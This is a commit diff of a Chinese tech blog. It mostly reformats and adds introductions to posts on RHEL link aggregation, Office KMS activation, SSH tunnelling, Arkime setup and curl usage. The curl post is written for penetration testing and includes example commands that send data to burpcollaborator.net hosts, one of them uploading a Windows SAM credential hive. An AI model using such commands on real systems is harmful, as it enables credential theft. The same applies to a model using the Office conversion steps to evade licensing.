添加简介

Author: runshell

content/post/基础运维/RHEL 8.10端口聚合.md

@@ -8,6 +8,10 @@ tags: ["RHEL"] # 文章标签
 categories: ["基础运维"] # 文章分类
 ---
 
+# 端口聚合简介
+
+端口聚合（Port Aggregation），也称为链路聚合或网口聚合，是一种将多个物理网络端口捆绑在一起形成单一逻辑连接的网络技术。这项技术在现代服务器环境中扮演着重要角色，特别是在需要高带宽、高可用性网络连接的数据中心和企业网络场景中。本文只介绍 RHEL 8.10 系统上逐流负载配置方法。
+
 # 创建聚合组
 
 ```bash

content/post/基础运维/office 下载安装激活.md

@@ -3,7 +3,7 @@ title: "office 下载安装激活" # 文章标题
 date: 2025-05-05T14:30:00+08:00 # 文章创建日期
 draft: false # 是否为草稿，true 表示草稿，不会在网站上显示
 author: "runshell" # 文章作者
-description: "下载安装激活全程安全无毒的方法介绍" # 文章描述
+description: "office下载、安装、激活全程安全无毒的方法介绍" # 文章描述
 tags: ["office"] # 文章标签
 categories: ["基础运维"] # 文章分类
 ---
@@ -24,7 +24,7 @@ https://gravesoft.dev/office_c2r_links#chinese-simplified-zh-cn
 
 ### 转换
 
-将 office 转换成 vol 版本，才可使用 kms 激活。以管理员身份打开命令行(cmd非powershell)，执行：
+将 office 转换成 vol 版本，才可使用 kms 激活。以管理员身份打开命令行(cmd 非 powershell)，执行：
 
 ```bat
 @rem 进入office ospp.vbs文件所在目录

content/post/网络安全/SSH隧道转发.md

@@ -1,16 +1,19 @@
 ---
-title: "SSH隧道转发"  # 文章标题
-date: 2018-07-15T14:30:00+08:00  # 文章创建日期
-draft: false  # 是否为草稿，true 表示草稿，不会在网站上显示
-author: "runshell"  # 文章作者
-description: "介绍利用ssh实现本地转发、远程转发以及socks5代理"  # 文章描述
-tags: ["ssh隧道","端口转发","内网穿透"]  # 文章标签
-categories: ["网络安全"]  # 文章分类
+title: "SSH隧道转发" # 文章标题
+date: 2018-07-15T14:30:00+08:00 # 文章创建日期
+draft: false # 是否为草稿，true 表示草稿，不会在网站上显示
+author: "runshell" # 文章作者
+description: "介绍利用ssh实现本地转发、远程转发以及socks5代理" # 文章描述
+tags: ["ssh隧道", "端口转发", "内网穿透"] # 文章标签
+categories: ["网络安全"] # 文章分类
 image: "/images/1536460373438.png"
 ---
 
+## 简介
 
-## 0x00 ssh常用参数说明
+常见的 ssh 协议不仅仅用于远程管理，还可以进行文件上传下载（scp）,还可以进行端口转发和 socks5 代理。本文介绍利用 ssh 实现本地转发、远程转发以及 socks5 代理的方法。
+
+## 0x00 ssh 常用参数说明
 
 ```bash
 -C  压缩传输数据,加快传输速度
@@ -19,7 +22,7 @@ image: "/images/1536460373438.png"
 -n  后台运行
 -q  安静模式,不要显示警告等信息
 -l  指定ssh登录名
--g  允许远程主机连接到本地转发的端口（本机监听地址设为0.0.0.0，不选则为127.0.0.1）    
+-g  允许远程主机连接到本地转发的端口（本机监听地址设为0.0.0.0，不选则为127.0.0.1）
 -L  进行本地端口转发
 -R  进行远程端口转发
 -D  动态转发,即socks代理
@@ -33,9 +36,9 @@ image: "/images/1536460373438.png"
 ssh [-C] [-f] [-N] [-g] -L [本机ip]:本机端口:vps能访问的主机ip:端口 <user@vps>
 ```
 
-将本地的一个端口映射到vps能到达的主机的一个端口。如果vps是边界设备，拥有多网卡，那么就可以用该方法访问内网主机的服务。
+将本地的一个端口映射到 vps 能到达的主机的一个端口。如果 vps 是边界设备，拥有多网卡，那么就可以用该方法访问内网主机的服务。
 
-> 例：假如你拥有一台web服务器的控制权，但是数据库服务器没有公网IP，你想直接访问数据库的服务，这时就可以使用本地转发，在本地（local）执行如下命令：
+> 例：假如你拥有一台 web 服务器的控制权，但是数据库服务器没有公网 IP，你想直接访问数据库的服务，这时就可以使用本地转发，在本地（local）执行如下命令：
 
 ```bash
 ssh -Nnf -L 6666:10.10.10.12:3306 root@188.224.123.45
@@ -47,17 +50,15 @@ mysql -u root -ppassword -P 6666
 
 ![1536460373438](/images/1536460373438.png)
 
-
-
 ## 0x02 远程转发
 
 ```bash
 ssh -C -f -N -R 0.0.0.0:vps_port:本机能访问的IP:端口 root@vps
 ```
 
-将vps上的一个端口映射到本机能到达的主机的一个端口。以至于可以通过vps访问内网的计算机上面的服务。遗憾的是，即使你指定了监听地址为0.0.0.0，它也仅能监听127.0.0.1，不能实现内网穿透。   
+将 vps 上的一个端口映射到本机能到达的主机的一个端口。以至于可以通过 vps 访问内网的计算机上面的服务。遗憾的是，即使你指定了监听地址为 0.0.0.0，它也仅能监听 127.0.0.1，不能实现内网穿透。
 
-然后经过一番折腾，得出答案，需要修改sshd的配置文件`/etc/ssh/sshd_config`,将配置做如下修改：
+然后经过一番折腾，得出答案，需要修改 sshd 的配置文件`/etc/ssh/sshd_config`,将配置做如下修改：
 
 ```config
 GatewayPorts yes
@@ -74,4 +75,4 @@ service sshd restart || systemctl restart sshd
 ssh -qTfnN -D 0.0.0.0:1080 root@vps -p 22
 ```
 
-本机将本地1080端口的所有流量发给vps，vps转发收到的流量。这就是赤裸裸的socks代理啊。
+本机将本地 1080 端口的所有流量发给 vps，vps 转发收到的流量。这就是赤裸裸的 socks 代理啊。

content/post/网络安全/centos stream9安装arkime.md

@@ -9,6 +9,10 @@ categories: ["网络安全"] # 文章分类
 image: "/images/Arkime_Logo.png"
 ---
 
+## Arkime 简介
+
+Arkime 是一个基于 Elasticsearch 的网络分析工具，用于捕获、存储和分析网络流量。它支持实时流量捕获和分析，以及历史流量的搜索和回放。Arkime 可以用于网络安全分析、流量监控和故障排除等场景。
+
 ## 下载包
 
 ```bash

content/post/网络安全/curl详解.md

@@ -1,40 +1,38 @@
 ---
-title: "curl详解"  # 文章标题
-date: 2018-07-15T14:30:00+08:00  # 文章创建日期
-draft: false  # 是否为草稿，true 表示草稿，不会在网站上显示
-author: "runshell"  # 文章作者
-description: "介绍Linux curl命令用法和Windows服务器powershell实现类似功能的方法"  # 文章描述
-tags: ["curl"]  # 文章标签
-categories: ["网络安全"]  # 文章分类
+title: "curl详解" # 文章标题
+date: 2018-07-15T14:30:00+08:00 # 文章创建日期
+draft: false # 是否为草稿，true 表示草稿，不会在网站上显示
+author: "runshell" # 文章作者
+description: "介绍Linux curl命令用法和Windows服务器powershell实现类似功能的方法" # 文章描述
+tags: ["curl"] # 文章标签
+categories: ["网络安全"] # 文章分类
 ---
 
-
-
 ## 0x00 前言
 
-在渗透测试中经常需要在艰难的环境下执行命令，比如没有回显。为了摆脱困境，经常需要传送文件。curl是一个非常厉害的工具，在绝大多数情况下，linux系统中是存在curl的。此外Windows系统中，powershell4.0及其以后的版本中提供了一个cmlet——`Invoke-WebRequest`，其别名之一是curl。所以，简单记录一下curl的用法。
+在渗透测试中经常需要在艰难的环境下执行命令，比如没有回显。为了摆脱困境，经常需要传送文件。curl 是一个非常厉害的工具，在绝大多数情况下，linux 系统中是存在 curl 的。此外 Windows 系统中，powershell4.0 及其以后的版本中提供了一个 cmlet——`Invoke-WebRequest`，其别名之一是 curl。所以，简单介绍一下 curl 的用法。
 
-## 0x01 Linux中的curl
+## 0x01 Linux 中的 curl
 
-### 1.http请求
+### 1.http 请求
 
-* **get**
+- **get**
 
-curl 命令后面直接跟url；使用-H指定请求头，每个-H指定一条header；使用 -o 指定输出到具体文件而不是标准输出。
+curl 命令后面直接跟 url；使用-H 指定请求头，每个-H 指定一条 header；使用 -o 指定输出到具体文件而不是标准输出。
 
 ```bash
-curl 'https://files.college.360.cn/others/Q1NBQS3lhoXnvZHmuJfpgI_mioDmnK8t56ysMTbor74tU01C5Y2P6K6uLnBkZg==?time=1537360082&sign=5fd0f26e3346e8171e8656caaa42b0fc' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36' -H 'Referer: https://admin.college.360.cn/user/student/course/1032'
+curl 'https://files.xx.cn/others/Q1NBQS3lhoXnvZHmuJfpgI_mioDmnK8t56ysMTbor74tU01C5Y2P6K6uLnBkZg==?time=1537360082&sign=5fd0f26e3346e8171e8656caaa42b0fc' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36' -H 'Referer: https://admin.xx.cn/user/student/course/1032'
 ```
 
-* **post**
+- **post**
 
-普通表单post，使用-d指定请求体内容。
+普通表单 post，使用-d 指定请求体内容。
 
 ```bash
 curl -d "user=admin&passwd=12345678" http://127.0.0.1:8080/login
 ```
 
-文件表单post，使用-F指定需要上传的文件。
+文件表单 post，使用-F 指定需要上传的文件。
 
 ```bash
 curl http://oumchi.burpcollaborator.net -F "6379.txt=@6379.txt"
@@ -65,68 +63,64 @@ curl http://oumchi.burpcollaborator.net -F "6379.txt=@6379.txt"
 
 ```
 
-* put
+- put
 
 ```bash
 curl http://6biy7e.burpcollaborator.net/ -T ca_setup.exe
 ```
 
-* 其它方法测试
+- 其它方法测试
 
 ```bash
 curl http://www.example.com -X OPTIONS
 curl http://www.example.com -X TRACE
 ...
 ```
 
-### 2.ftp请求
+### 2.ftp 请求
 
-* **get**
+- **get**
 
 ```bash
 curl ftp://user:passwd@ftpserver.com:port/path/filename -o filepath
 ```
 
-* **put**
+- **put**
 
 ```bash
 curl –u name:passwd -T size.mp3 ftp://www.xxx.com/mp3/
 ```
 
-* **ls(dir)**
+- **ls(dir)**
 
 ```bash
 curl ftp://user:passwd@ftpserver.com:port/path/
 ```
 
-* **delete**
+- **delete**
 
 ```bash
 curl –u name:passwd ftp://www.xxx.com/ -X 'DELE mp3/size.mp3'
 ```
 
 ### 3.其他
 
-```ba'sh
+```ba'sh
 -u, --user <user:password> 需要口令验证的http或ftp
 --ntlm 使用htlm认证
 -A, --user-agent <name> 指定请求头中的user-agent字段
 --socks5 <host[:port]> 使用sockes5代理
 -x, --proxy [protocol://]host[:port] 使用http/https代理
- 
+
 --post301       Do not switch to GET after following a 301 不跳转301
 --post302       Do not switch to GET after following a 302 不跳转302
 --post303       Do not switch to GET after following a 303 不跳转303
 
 ```
 
+## 0x02 Windows 中的 curl
 
-
-
-
-## 0x02 Windows中的curl
-
-powershell 中的curl是`Invoke-WebRequest`，它的另一个别名是wget。它是使用`-Headers <IDictionary>`来指定请求头，powershell5.x即以前版本可以指定所有请求头，之后的版本UserAgent只能通过`-UserAgent <String>`指定。
+powershell 中的 curl 是`Invoke-WebRequest`，它的另一个别名是 wget。它是使用`-Headers <IDictionary>`来指定请求头，powershell5.x 即以前版本可以指定所有请求头，之后的版本 UserAgent 只能通过`-UserAgent <String>`指定。
 
 ```powershell
 Invoke-WebRequest [-Uri] <Uri> [-Body <Object>] [-Certificate <X509Certificate>] [-CertificateThumbprint <String>] [-ContentType <String>] [-Credential <PSCredential>
@@ -138,25 +132,25 @@ Invoke-WebRequest [-Uri] <Uri> [-Body <Object>] [-Certificate <X509Certificate>]
 
 ### 1.http
 
-* **get**
+- **get**
 
-使用-UserAgent 指定UA，使用-Headers指定请求头，使用-OutFile指定输出到文件。若不使用-OutFile，将返回一个HtmlWebResponseObject对象，只在屏幕上显示部分摘要信息，若要显示详细信息可以先将其存入变量，再查看变量content等属性。若只想产看响应体，可用管道符传给`write-host`,如`curl ifconfig.me | write-host` 。
+使用-UserAgent 指定 UA，使用-Headers 指定请求头，使用-OutFile 指定输出到文件。若不使用-OutFile，将返回一个 HtmlWebResponseObject 对象，只在屏幕上显示部分摘要信息，若要显示详细信息可以先将其存入变量，再查看变量 content 等属性。若只想产看响应体，可用管道符传给`write-host`,如`curl ifconfig.me | write-host` 。
 
 ```powershell
-Invoke-WebRequest -Uri "https://files.college.360.cn/others/Q1NBQS3lhoXnvZHmuJfpgI_mioDmnK8t56ysMTbor74tU01C5Y2P6K6uLnBkZg==?time=1537360082&sign=5fd0f26e3346e8171e8656caaa42b0fc" -Headers @{"Accept"="*/*"; "Referer"="https://admin.college.360.cn"} -UserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" -OutFile xxx.pdf
+Invoke-WebRequest -Uri "https://files.xx.cn/others/Q1NBQS3lhoXnvZHmuJfpgI_mioDmnK8t56ysMTbor74tU01C5Y2P6K6uLnBkZg==?time=1537360082&sign=5fd0f26e3346e8171e8656caaa42b0fc" -Headers @{"Accept"="*/*"; "Referer"="https://admin.xx.cn"} -UserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" -OutFile xxx.pdf
 ```
 
-* **post**
+- **post**
 
-在使用非get方法时必须用-Method指定请求方法；请求体可以用-body指定一个string或其它类型的对象，也可以从本地文件获取内容作为请求体，使用-infile指定本地文件。
+在使用非 get 方法时必须用-Method 指定请求方法；请求体可以用-body 指定一个 string 或其它类型的对象，也可以从本地文件获取内容作为请求体，使用-infile 指定本地文件。
 
 ```powershell
-curl http://lti9gf.burpcollaborator.net -Method post -Body "user=admin&passwd=12345678" 
+curl http://lti9gf.burpcollaborator.net -Method post -Body "user=admin&passwd=12345678"
 ```
 
-* **put**
+- **put**
 
-如果服务器支持put方法，可以直接put上传文件
+如果服务器支持 put 方法，可以直接 put 上传文件
 
 ```powershell
 curl http://lti9gf.burpcollaborator.net -Method put -InFile ‪C:\sam.hive
@@ -172,7 +166,7 @@ curl ftp://user:password@127.0.0.1:21/s2-057.py -outFile s2-057.py
 
 ## 0x03 net.webclient
 
-在powershell4.0以前没有提供`Invoke-WebRequest`,这时我们可以使用Net.WebClient，它是.NET Framework中的一个类。它的功能更加强大。
+在 powershell4.0 以前没有提供`Invoke-WebRequest`,这时我们可以使用 Net.WebClient，它是.NET Framework 中的一个类。它的功能更加强大。
 
 ```powershell
 #ftp下载